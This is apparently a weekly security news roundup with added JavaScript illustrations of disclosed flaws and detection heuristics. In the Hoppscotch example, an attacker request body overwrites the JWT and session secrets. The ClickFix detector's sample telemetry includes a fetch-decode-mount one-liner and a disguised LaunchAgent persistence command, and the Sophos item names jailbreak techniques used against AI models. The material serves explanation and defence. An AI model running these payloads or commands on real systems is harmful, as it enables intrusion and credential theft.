It’s dumb out there again.
This week has the usual smell of prod on fire and nobody wanting to admit who left the door open — old creds still working, trusted apps doing sketchy crap, browser tricks jumping the fence, and “normal” workflows turning into phishing pipes because apparently email was not enough hell already.
The worst part is how cheap some of it feels. Not elite. Not cinematic. Just stale secrets, fake updates, lazy trust, and random boxes quietly becoming someone else’s infrastructure. Same internet, fresh headache. Let’s get into it.
-
Privacy-first bot defense
Cloudflare has teamed up with Google Chrome, Microsoft Edge, and Mozilla Firefox to create a privacy-preserving protocol that websites can use to separate desirable web traffic from undesirable network requests. This involves the use of Private Access Control Tokens (PACT), which allow websites to issue anonymous tokens that assert a given browsing session is being run by a human. "A user's browser can then provide these tokens to other sites to prove that a human is in the loop, reducing the need for annoying and clunky captchas or invasive tracking," Cloudflare said. "PACT is designed so that sites cannot leverage it to track or identify users or their browsing history."
-
Six curl CVEs
AISLE said it discovered six vulnerabilities in curl, which range from "classic memory-lifetime issues to logic bugs in how libcurl decides whether a connection, credential, or host identity is still valid." One of the notable vulnerabilities is CVE-2026-8932, which allows the library to "reuse a previously created connection even when some mTLS config-related option had been changed that should have prohibited reuse." In practice that means a process that switches its client certificate mid-run can keep sending requests over a connection the server authenticated under the previous identity. AISLE described it as the oldest curl vulnerability reported so far: the affected code has shipped in every release since curl 7.7 of March 22, 2001. All six flaws are fixed in version 8.21.0.
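The following is an added illustration of the bug class described above, not libcurl's code. It models a connection cache whose reuse key either covers only the endpoint, so a request with different mTLS settings silently rides the old socket, or also covers every option that changes who the connection is authenticated as. Hostnames, certificate paths and field names are made up for the example.

```javascript
// Added illustration, not libcurl's code: a minimal connection cache whose
// reuse key either covers only the endpoint (the class of bug described
// above) or also covers every option that changes who the connection is
// authenticated as. Hostnames and certificate paths are made up.

let nextConnectionId = 1;

// A "connection" remembers the options it was opened with, which is all the
// example needs to show which identity is on the wire.
function openConnection(opts) {
  return { id: nextConnectionId++, opened: { ...opts } };
}

// Endpoint-only key: a later request with different mTLS settings still
// hits the cache, so it rides a socket authenticated as the old identity.
function endpointKey(opts) {
  return `${opts.scheme}://${opts.host}:${opts.port}`;
}

// Identity-aware key: any change to client cert, key, trust store or
// verification flags yields a different key and therefore a new connection.
const IDENTITY_FIELDS = ['clientCert', 'clientKey', 'caBundle', 'verifyPeer', 'verifyHost'];
function identityKey(opts) {
  const tail = IDENTITY_FIELDS.map((f) => `${f}=${opts[f] ?? ''}`).join('|');
  return `${endpointKey(opts)}|${tail}`;
}

class ConnectionPool {
  constructor(keyFn) {
    this.keyFn = keyFn;
    this.cache = new Map();
  }
  // Returns the connection plus whether it came from the cache.
  acquire(opts) {
    const key = this.keyFn(opts);
    if (this.cache.has(key)) return { conn: this.cache.get(key), reused: true };
    const conn = openConnection(opts);
    this.cache.set(key, conn);
    return { conn, reused: false };
  }
}

// Two requests to the same host; the second switches client certificate.
function runScenario(keyFn) {
  const pool = new ConnectionPool(keyFn);
  const base = { scheme: 'https', host: 'api.example.test', port: 443, caBundle: '/etc/ssl/ca.pem', verifyPeer: true, verifyHost: true };
  const first = pool.acquire({ ...base, clientCert: '/etc/pki/alice.pem', clientKey: '/etc/pki/alice.key' });
  const second = pool.acquire({ ...base, clientCert: '/etc/pki/bob.pem', clientKey: '/etc/pki/bob.key' });
  return {
    reused: second.reused,
    sameSocket: first.conn.id === second.conn.id,
    identityOnWire: second.conn.opened.clientCert, // what the server actually authenticated
  };
}

const ENDPOINT_ONLY = runScenario(endpointKey);   // reused: true, identity still alice
const IDENTITY_AWARE = runScenario(identityKey);  // reused: false, identity is bob
```

Real libcurl compares far more than these fields when deciding reuse, and the authoritative fix is the one in 8.21.0. If you cannot update yet and your application changes client identity on a shared handle, setting CURLOPT_FRESH_CONNECT on the affected transfers (or using one handle per identity) forces a new connection and sidesteps the cache entirely.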
-
Unauthenticated takeover
A critical security flaw has been disclosed in self-hosted versions of Hoppscotch (CVE-2026-50160, CVSS score: 10.0), an open source API platform, that can result in complete compromise. Offgrid Security's autonomous AI security agent, Kiro, has been credited with discovering the bug. "The POST /v1/onboarding/config endpoint allows an unauthenticated attacker to inject arbitrary InfraConfig keys -- including JWT_SECRET and SESSION_SECRET -- into the database via mass assignment," the project maintainers said. "These keys are not declared in the SaveOnboardingConfigRequest DTO, but because the NestJS ValidationPipe does not strip extra properties, they pass through to the service layer, where Object.entries(dto) iterates all keys without restriction." Successful exploitation leads to full server compromise and persistent access that survives password resets, since whoever holds JWT_SECRET can mint valid tokens for any account regardless of its password. Offgrid Security told The Hacker News that four independent weaknesses combine to let an unauthenticated attacker overwrite the JWT signing key in a single HTTP request, with no credentials required. The issue has been fixed in hoppscotch-backend version 2026.5.0.
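To make the mass-assignment path concrete, here is an added illustration that is not Hoppscotch's code. The DTO is a plain object, the validation pipe is a function, and the config store is a Map; the only names taken from the advisory are the endpoint, JWT_SECRET and SESSION_SECRET. The DTO field names, the store contents and the attacker body are assumed for the example.

```javascript
// Added illustration, not Hoppscotch's code. The DTO is a plain object, the
// validation pipe is a function, and the config store is a Map. The only
// names taken from the advisory are the endpoint, JWT_SECRET and
// SESSION_SECRET; the DTO field names below are assumed for the example.

// What the onboarding request is allowed to carry.
const ONBOARDING_DTO_KEYS = new Set(['mailerSmtpEnable', 'mailerSmtpUrl', 'mailerAddressFrom']);

// Config keys whose compromise hands out persistent access.
const SENSITIVE_KEYS = new Set(['JWT_SECRET', 'SESSION_SECRET', 'DATABASE_URL']);

// Vulnerable pipe: checks the declared fields (elided here) but hands the
// whole body on, extra properties included.
function validatePassThrough(body) {
  return { ...body };
}

// Hardened pipe with whitelist semantics: undeclared keys are dropped, or
// rejected outright when forbidUnknown is set. Rejecting is the better
// default for anything that writes configuration.
function validateWhitelist(body, { forbidUnknown = false } = {}) {
  const dto = {};
  for (const [key, value] of Object.entries(body)) {
    if (ONBOARDING_DTO_KEYS.has(key)) dto[key] = value;
    else if (forbidUnknown) throw new Error(`property ${key} should not exist`);
  }
  return dto;
}

// Service layer as the advisory describes it: iterates every key it is given.
function saveOnboardingConfig(dto, store) {
  for (const [key, value] of Object.entries(dto)) store.set(key, value);
}

// Stand-in for POST /v1/onboarding/config: body -> pipe -> service -> store.
function handleOnboardingPost(body, pipe) {
  const store = new Map([['JWT_SECRET', 'original-secret']]);
  saveOnboardingConfig(pipe(body), store);
  return store;
}

// Which sensitive keys in the store now hold the attacker-supplied value.
function overwrittenSecrets(store, marker) {
  return [...store].filter(([k, v]) => SENSITIVE_KEYS.has(k) && v === marker).map(([k]) => k);
}

// Constructed attacker request: plausible SMTP fields plus the two secrets.
const ATTACKER_BODY = {
  mailerSmtpEnable: 'true',
  mailerSmtpUrl: 'smtp://mail.example.test',
  JWT_SECRET: 'attacker-chosen',
  SESSION_SECRET: 'attacker-chosen',
};

const vulnerableStore = handleOnboardingPost(ATTACKER_BODY, validatePassThrough); // both secrets overwritten
const hardenedStore = handleOnboardingPost(ATTACKER_BODY, validateWhitelist);     // secrets untouched
```

In a real NestJS app the whitelist behaviour above corresponds to `new ValidationPipe({ whitelist: true, forbidNonWhitelisted: true })`, which strips or rejects properties the DTO does not declare. That closes the mass-assignment path, but note the caveat the advisory implies: an onboarding endpoint that writes secrets without authentication is a separate weakness, and whitelisting alone does not make it safe to expose.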
-
Proxyware in smart TVs
A new report from Spur Intelligence has revealed that more than one-third of the LG and Samsung smart TV apps it reviewed contain proxyware that can relay third-party traffic through the TV owner's internet connection with users' consent. The company said it scanned 6,038 apps across LG webOS and Samsung Tizen and found 2,058 that contain residential proxy software, including clocks, screensavers, games, fish tanks, and other low-utility apps. On LG webOS, 42.5% of apps carried such code; on Samsung Tizen, the rate was 26.9%; across both platforms, it reached 34.1%. Bright Data, Massive, and Oxylabs are the top three SDK providers on webOS and Tizen. "Smart TVs are almost ideal proxy hosts. They sit on the same home network as everything else, but they do not feel like computers, so people rarely audit them like computers," Spur said. "There is no battery drain to notice, no cellular bill to spike, no app switcher full of suspicious background activity. A TV can stay plugged in, signed in, and online for years while the user thinks of it as furniture." The threat intelligence firm said this dynamic also changes the consent equation, as users may not realize what it actually means to sell access to their residential IP address. "Technically, these applications are compliant with gaining consent based on how they inform the user," Spur CTO Alastair Parr told The Hacker News. "However, there is often no verification that the user is either of age or authorized to provide consent on the device. The reality is that there are likely many smart TVs scattered across office spaces and residential homes, quietly part of these networks, without the responsible owners' awareness or consent." Amazon's Device and System Abuse Policy explicitly bars apps that facilitate proxy services for third parties, and Roku has enabled similar protections. LG and Samsung have yet to enforce an equivalent policy.
-
Edgecution via Teams
An initial access broker (IAB) affiliated with Payouts King ransomware has been observed masquerading as IT personnel in social engineering attacks conducted via Microsoft Teams to deliver a malicious Microsoft Edge browser extension dubbed Edgecution. "The technique utilizes a malicious Microsoft Edge browser extension that exploits the Chrome native messaging protocol to interact with host-native applications beyond the confines of the browser sandbox," Zscaler ThreatLabz said. "By abusing this interface, the attackers gain direct host access, enabling them to manipulate the local filesystem, launch processes, and execute arbitrary code on the compromised host." The malware has two components: a Microsoft Edge browser extension named "Edge Monitoring Agent" that beacons to a command-and-control (C2) server and relays host-based commands to the second component, a Python-based backdoor that can collect system information, enumerate running processes, provide filesystem access, and execute arbitrary Python code and shell commands. The extension is invisible to the user because it is loaded in a headless Microsoft Edge instance. A similar attack chain involving a Chromium-based extension codenamed SNOWBELT was detailed by Google-owned Mandiant in April 2026.
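Native messaging is a documented browser feature rather than an exploit: the browser launches a registered host binary and talks to it over stdin/stdout with length-prefixed JSON, and the binding between extension id and binary lives in a per-user manifest that needs no administrative rights to register. The block below is an added example, not Zscaler's or the malware's code: it implements that wire format, runs one simulated request/reply, and audits a host manifest for the traits a defender would hunt for. The extension id, binary path, command names and manifest contents are constructed.

```javascript
// Added example, not Zscaler's or the malware's code: the wire format a
// Chromium-family browser uses to talk to a native messaging host, one
// simulated exchange, and a check over a host manifest. The extension id,
// binary path, command vocabulary and manifest contents are constructed.

const MAX_HOST_MESSAGE = 1024 * 1024; // the browser drops host->browser messages over 1 MiB

// Wire format: 4-byte length in native byte order, then UTF-8 JSON.
// Little-endian here, which is what x86 and arm64 hosts see.
function encodeFrame(obj) {
  const payload = Buffer.from(JSON.stringify(obj), 'utf8');
  const header = Buffer.alloc(4);
  header.writeUInt32LE(payload.length, 0);
  return Buffer.concat([header, payload]);
}

// Pull every complete frame out of a buffer and hand back the unconsumed
// tail, so a stdin reader can accumulate partial reads.
function decodeFrames(buf) {
  const messages = [];
  let offset = 0;
  while (buf.length - offset >= 4) {
    const len = buf.readUInt32LE(offset);
    if (len > MAX_HOST_MESSAGE) throw new Error(`frame of ${len} bytes exceeds the 1 MiB host limit`);
    if (buf.length - offset - 4 < len) break; // incomplete frame, wait for more bytes
    const body = buf.subarray(offset + 4, offset + 4 + len).toString('utf8');
    messages.push(JSON.parse(body));
    offset += 4 + len;
  }
  return { messages, rest: buf.subarray(offset) };
}

// One round trip as the extension and a host would see it. The command
// vocabulary is constructed for the example.
function simulateExchange() {
  const fromBrowser = encodeFrame({ cmd: 'list_dir', path: 'C:\\Users' });
  const [request] = decodeFrames(fromBrowser).messages;        // host reads stdin
  const reply = { ok: true, cmd: request.cmd, entries: ['Public', 'victim'] };
  const fromHost = encodeFrame(reply);                           // host writes stdout
  return decodeFrames(fromHost).messages[0];                     // extension reads it
}

// The host manifest binds an extension id to a binary. On Windows, Edge
// looks it up under HKCU\Software\Microsoft\Edge\NativeMessagingHosts,
// which is per-user, so registering one needs no admin rights.
const EXT_ORIGIN = /^chrome-extension:\/\/[a-p]{32}\/$/;
function auditManifest(m) {
  const findings = [];
  if (m.type !== 'stdio') findings.push('type is not stdio');
  if (!Array.isArray(m.allowed_origins) || !m.allowed_origins.every((o) => EXT_ORIGIN.test(o)))
    findings.push('allowed_origins malformed');
  if (/(python|pwsh|powershell|cmd|node)(\d+)?(\.exe)?$/i.test(m.path)) findings.push('path is a script interpreter');
  if (/\\Users\\Public\\|AppData\\Local\\Temp\\|^\/tmp\//i.test(m.path)) findings.push('path is in a user-writable location');
  return findings;
}

// Constructed manifest shaped like what a dropped Python backdoor would register.
const SAMPLE_MANIFEST = {
  name: 'com.example.edge_monitoring_agent',
  description: 'Edge Monitoring Agent',
  path: 'C:\\Users\\Public\\agent\\python.exe',
  type: 'stdio',
  allowed_origins: ['chrome-extension://abcdefghijklmnopabcdefghijklmnop/'],
};
```

For hunting, enumerate the NativeMessagingHosts registry keys and manifest directories for every Chromium-based browser on the host and run each manifest through a check like `auditManifest`: an interpreter or a user-writable path as the host binary, paired with an extension id you did not deploy, is the pairing this campaign depends on.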
-
Legacy credential breach
Competitive intelligence company Klue has revealed that a credential dating back to 2022, issued for a limited pilot, was exploited by the Icarus extortionists to steal Salesforce data from its corporate customers, including several cybersecurity companies. In a statement shared with TechCrunch, the company said the credential was "originally provided to a third-party in 2022, for a limited pilot." Klue did not share specifics about the purpose of the pilot, how long it ran, or the identity of the third party that received the credential. It's also unclear why the credential wasn't revoked once the pilot concluded, and how the attackers acquired it in the first place. A number of companies have confirmed they had limited Salesforce information stolen in the attack, including 8x8, BeyondTrust, Gong, Jamf, HackerOne, Insurity, LastPass, OneTrust, Pendo, Recorded Future, Snyk, Sprout Social, and Tanium.
-
State-crime convergence
NCC Group said it has found growing evidence of nation-state actors increasingly leveraging tools and tactics traditionally associated with financially motivated cybercrime to disguise their espionage and intelligence-gathering operations, blurring the line between the two sets of activities. "Historically, organisations could draw a relatively clear distinction between ransomware attacks driven by financial gain and nation-state operations designed to support strategic objectives. That distinction is becoming increasingly difficult to make," Matt Hull, VP of Cyber Intelligence and Response at NCC Group, said. "What we're seeing is a convergence of criminal and state-backed activity. Threat actors are sharing infrastructure, adopting common tooling and, in some cases, deliberately operating behind established ransomware brands to obscure attribution and delay response efforts."
-
Admin reset alerts
Google said it's expanding the existing "Super Admin password reset" alert into a broader Admin password reset alert in Alert Center. "Previously, this rule only triggered alerts when a super admin's password was changed," the company said. "With this update, the alert will now cover password resets for all administrator roles within your organization. This update provides admins with better visibility and control over the security of their organization's privileged accounts. Monitoring password changes for all admin roles provides a higher level of oversight to respond more quickly to potential account compromises or unauthorized changes." The change is applicable to all Google Workspace customers.
-
ClickFix targets macOS
A new ClickFix campaign has been observed tricking users into copying malicious commands and pasting them into the Terminal app; the command silently downloads and mounts a malicious DMG file. The disk image contains a self-signed information stealer that can harvest a user's system password, data from web browsers, wallets, messaging apps, and Keychain, exfiltrate the data, set up LaunchAgent persistence, and tamper with Ledger Live and Trezor Suite installations by replacing legitimate components to hijack cryptocurrency wallet information. Palo Alto Networks Unit 42 assesses the stealer to belong to the Atomic macOS Stealer (AMOS) lineage, specifically a variant called Odyssey. The development comes as the company detailed another multi-step ClickFix attack that employs techniques like brandsquatting to deliver a cross-platform trojan with browser-credential stealing, remote shell, live screen streaming, keylogger, file manager, and SSH tunneling capabilities.
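The chain above has a recognisable shape in process telemetry: a Terminal-spawned one-liner that fetches a payload, decodes or mounts it, and then plants a LaunchAgent. The block below is an added example, not Unit 42's code, that scores command lines against that shape. The sample records, their field names, the indicator weights and the alert threshold are constructed for the example and do not come from any real EDR schema.

```javascript
// Added example, not Unit 42's code: a scoring heuristic over process
// execution records that flags the shape ClickFix abuses on macOS, a pasted
// one-liner that fetches a payload, mounts a disk image or pipes into a
// shell, and plants a LaunchAgent. The records, field names, weights and
// threshold are constructed for the example.

const INDICATORS = [
  { name: 'remote_fetch',      weight: 2, re: /\b(curl|wget)\b[^|;&]*https?:\/\//i },
  { name: 'inline_decode',     weight: 2, re: /\bbase64\b[^|;&]*(-d|--decode|-D)\b/i },
  { name: 'mount_dmg',         weight: 3, re: /\bhdiutil\s+attach\b|\bopen\b[^|;&]*\.dmg\b/i },
  { name: 'pipe_to_shell',     weight: 3, re: /\|\s*(ba|z)?sh\b|\bbash\s+-c\b|\beval\s+"?\$\(/i },
  { name: 'quiet_mount',       weight: 1, re: /\bhdiutil\b[^|;&]*-(quiet|nobrowse)\b/i },
  { name: 'launchagent_write', weight: 2, re: /Library\/LaunchAgents\/\S+\.plist/i },
  // A user-level agent named like Apple's own is a masquerade tell on its own.
  { name: 'apple_named_agent', weight: 3, re: /Library\/LaunchAgents\/com\.apple\.\S+\.plist/i },
];
const ALERT_THRESHOLD = 5;

// Score one command line: matched indicator names, summed weight, and
// whether it crosses the threshold.
function scoreCommand(cmdline) {
  const matched = INDICATORS.filter((i) => i.re.test(cmdline));
  const score = matched.reduce((s, i) => s + i.weight, 0);
  return { hits: matched.map((i) => i.name), score, alert: score >= ALERT_THRESHOLD };
}

// Annotate a batch of records. Everything is scored, so a DMG mounted from
// Finder shows up as a low score rather than being filtered out blind.
function triage(records) {
  return records.map((r) => ({ ...r, ...scoreCommand(r.cmdline) }));
}

// Constructed telemetry: two stages of a pasted one-liner, then two benign records.
const SAMPLE_RECORDS = [
  { pid: 4120, parent: 'Terminal', cmdline: 'curl -fsSL https://cdn.example.test/u.dat | base64 -d > /tmp/u.dmg && hdiutil attach -quiet -nobrowse /tmp/u.dmg' },
  { pid: 4188, parent: 'Terminal', cmdline: 'cp /Volumes/Update/agent.plist ~/Library/LaunchAgents/com.apple.update.plist && launchctl load ~/Library/LaunchAgents/com.apple.update.plist' },
  { pid: 5001, parent: 'Terminal', cmdline: 'brew install jq' },
  { pid: 5002, parent: 'Finder',   cmdline: 'hdiutil attach /Users/dev/Downloads/Docker.dmg' },
];

const TRIAGED = triage(SAMPLE_RECORDS); // records 1 and 2 alert, 3 and 4 do not
```

Weights like these are a starting point, not a rule set: tune them against your own baseline of developer activity, and pair the command-line scorer with a periodic diff of `~/Library/LaunchAgents` so persistence is caught even when the original paste was never logged.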
-
TfL hackers convicted
Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, have been convicted in the U.K. for orchestrating a cyber attack on Transport for London (TfL) in 2024 that caused an estimated $38.2 million in losses. The two, who were members of the online criminal collective known as Scattered Spider, were arrested last September and pleaded not guilty to the charges at a court appearance in November 2025. They are scheduled for sentencing on July 16, 2026. "Scattered Spider is a prolific criminal group that engages in data extortion and other criminal activities, utilizing social engineering techniques and SIM swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication," the U.S. Federal Bureau of Investigation (FBI) said.
-
Marketplace admin extradited
Abdellah Belmili (aka Dila Belmili or SPOX), a 26-year-old Algerian national, has been arrested, charged, and extradited from Spain to the U.S. on charges of conspiracy to commit bank fraud. SPOX is alleged to have acted as an administrator for a cybercrime marketplace ("www.market0day[.]com") as well as created phishing kits that have been used to compromise major U.S. financial institutions. "Between September and November 2020, Belmili advertised the marketplace and facilitated some of the customer support for the marketplace on his personal Telegram channel @SpoxCoder," the U.S. Justice Department said. "In late December 2020, after several customers complained that they had not received their purchases from www.market0day[.]com, Belmili replied that he was no longer the administrator, and instead had opened up a new marketplace – www.spoxy[.]us, advertising the new marketplace as a 'new store for bulk SMS.' 'Bulk SMS' typically refers to sending phishing or other fraudulent messages via text message." Approximately 5,600 U.S. and international victims have been identified.
-
Collaboration phishing
A new phishing campaign is abusing Outlook Groups and Microsoft 365 collaboration features to "make malicious activity appear routine," Fortra said. The attack involves adding targets to an attacker-controlled Microsoft 365 group and then using the group mailbox, shared files, or fake calendar invites (aka CalPhishing) to facilitate credential theft, token capture, or malware delivery. "The technique shifts malicious intent away from a single phishing email into a trusted productivity workflow," the company said. "A user may see what looks like a normal group addition, internal update, shared resource, or calendar item before being pushed toward an action."
-
AI in cybercrime
A new analysis from Sophos has revealed that AI has emerged as a hot-button topic in underground communities, as threat actors debate its potential for malware and tool development, while some express concerns about the technology reducing work opportunities. This includes posts selling API keys for generative AI tools; advertisements for tools said to enhance social engineering; AI-enabled malware (e.g., ApexAI, Metatron, and PolyEngine); discussion of jailbreaks for public AI models that bypass censorship and other safeguards using techniques like role-play framing, multi-stage prompting, and contextual manipulation; and offers to hire or partner with prompt engineers. Threat actors have also discussed the use of public AI assistants for intrusion activity, and marketed a tool called Leak Bazaar that claims to use AI to triage and sift through mountains of stolen data before it is packaged and traded with other threat actors. Not all have embraced AI with open arms, however, with some voicing skepticism and worries about how the rise of AI could "reshape roles, pricing, and competitive advantage within the cybercrime economy."
-
8,500 REDCap instances
Censys has uncovered just over 8,500 REDCap instances globally as of June 16, 2026, with most of them located in the U.S., the U.K., Germany, and Australia. REDCap, short for Research Electronic Data Capture, is a web application used by research institutions globally to hold clinical trial data, participant records, and other sensitive research information. Last week, Google Threat Intelligence Group (GTIG) attributed a year-plus espionage campaign against North American academic, medical, and military research institutions to UNC6508, a China-nexus actor. The intrusion set leveraged internet-facing REDCap servers as an initial access vector to deploy a backdoor called INFINITERED and exfiltrate sensitive data. How the servers are being compromised has not been confirmed. The earliest known compromise dates to September 2023.
-
Surveillance export gaps
A report from Human Rights Watch has revealed that a Bulgaria-based surveillance technology firm named Circles was licensed to sell its tools to countries that were likely to use them for repression or to commit serious human rights violations. Documents describe licenses for exports of Circles' technology to Azerbaijan, Bahrain, Brazil, Dominican Republic, El Salvador, Ghana, Guatemala, Israel, Jordan, Malaysia, Mexico, Morocco, Panama, Serbia, and the U.A.E. Clients included intelligence services, military and police bodies, regional governments, and private companies, Human Rights Watch said. That said, it's currently not known whether the technology was actually exported. "Nonetheless, issuing the licenses demonstrates a major flaw in how individual governments implement E.U. export controls for surveillance technology," the non-profit said. "The controls are intended to limit exports of surveillance technology to destinations where there is a likelihood it could be used to violate rights, and to provide transparency about what exports take place."
-
BitB malware lures
A campaign that impersonates popular software brand names has leveraged the Browser-in-the-Browser (BitB) technique to distribute malicious payloads by means of a reusable phishing kit. It makes use of a draggable pop-up with a spoofed URL to serve a fake software update warning. "The campaign uses social engineering to trick victims into downloading and manually executing a malicious installer (e.g., an .exe payload)," Unit 42 said. "The pages simulate a stalled document load and present an 'out of date' software error." Earlier this month, Unit 42 disclosed details of a second BitB campaign involving at least 10 unique domains that was used to steal Microsoft 365 credentials using a draggable, OS/browser-fingerprinted pop-up with a spoofed OAuth URL. In this attack, victims who click a Microsoft sign-in button are presented with what appears to be a standard login page designed to harvest credentials. The tell in both cases is the same: the "window" is a DOM element drawn inside the page, so it cannot be dragged outside the parent browser window and does not appear as a separate window in the OS.
If there’s a theme here, it’s that attackers do not need magic when the boring crap still works — forgotten creds, lazy trust, fake updates, loose admin paths, and users getting nudged into doing the dangerous part themselves. The future is here, somehow, and it still smells like a misconfigured staging box.
Patch what you can. Revoke what you forgot. Maybe glance at the devices you’ve been treating like furniture. See you next ThreatsDay, assuming the internet hasn’t found an even dumber way to catch fire by then.
<small>Source: The Hacker News</small>